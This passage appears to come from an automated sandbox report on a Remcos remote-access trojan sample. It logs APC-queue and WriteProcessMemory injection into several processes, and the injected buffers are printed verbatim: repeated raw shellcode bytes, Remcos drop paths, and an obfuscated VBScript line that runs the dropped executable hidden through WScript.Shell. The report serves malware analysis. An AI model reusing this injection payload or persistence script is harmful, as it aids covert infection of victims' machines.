parameter: 0x000c0000
success 0 0
1619628976.65
NtQueueApcThread
thread_handle: 0x00000108
process_identifier: 628
function_address: 0x000f05c0
parameter: 0x00100000
success 0 0
1619628991.574187
NtQueueApcThread
thread_handle: 0x00000108
process_identifier: 4136
function_address: 0x000b05c0
parameter: 0x00100000
success 0 0
1619628999.951403
NtQueueApcThread
thread_handle: 0x00000108
process_identifier: 4756
function_address: 0x000b05c0
parameter: 0x000c0000
success 0 0
Potential code injection by writing to the memory of another process (14 个事件)
Time & API Arguments Status Return Repeated
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exe" ZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628948.60475
WriteProcessMemory
process_identifier: 3716
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628961.2605
WriteProcessMemory
process_identifier: 1880
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628961.2605
WriteProcessMemory
process_identifier: 1880
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628974.541875
WriteProcessMemory
process_identifier: 3780
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628974.541875
WriteProcessMemory
process_identifier: 3780
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628976.65
WriteProcessMemory
process_identifier: 628
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000f0000
success 1 0
1619628976.65
WriteProcessMemory
process_identifier: 628
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x00100000
success 1 0
1619628991.574187
WriteProcessMemory
process_identifier: 4136
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F 